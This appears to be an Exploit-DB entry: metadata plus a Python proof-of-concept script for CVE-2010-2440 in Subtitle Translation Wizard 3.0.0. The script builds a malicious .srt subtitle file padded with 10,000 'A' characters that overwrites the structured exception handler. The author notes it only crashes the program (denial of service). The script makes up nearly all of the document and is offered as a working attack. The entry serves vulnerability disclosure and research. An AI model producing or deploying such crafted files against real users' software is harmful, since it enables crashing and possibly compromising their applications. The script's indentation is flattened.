Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)
Author: blake
type: dos
platform: windows
port:
date_added: 2010-06-22
date_updated: 2010-06-22
verified: 1
codes: OSVDB-65678;CVE-2010-2440
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt14000/13965.png
application_url: http://www.exploit-db.comst-wizard-setup.exe
#!/usr/bin/python
# Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC
# Date: Jun 21, 2010
# Author: Blake
# Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe
# Version: 3.0.0
# Tested on: Windows Vista running in VirtualBox
# SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH).
print "\n======================================"
print " Subtitle Translation Wizard v3.0.0 DoS "
print " Discovered by Blake "
print "======================================\n"
buffer = "\x41" * 10000
print "[+] Creating malicious srt file"
try:
file = open("poc.srt","w")
file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer)
file.close()
print "[+] File created"
except:
print "[x] Could not create file"
raw_input("\nPress any key to exit...\n")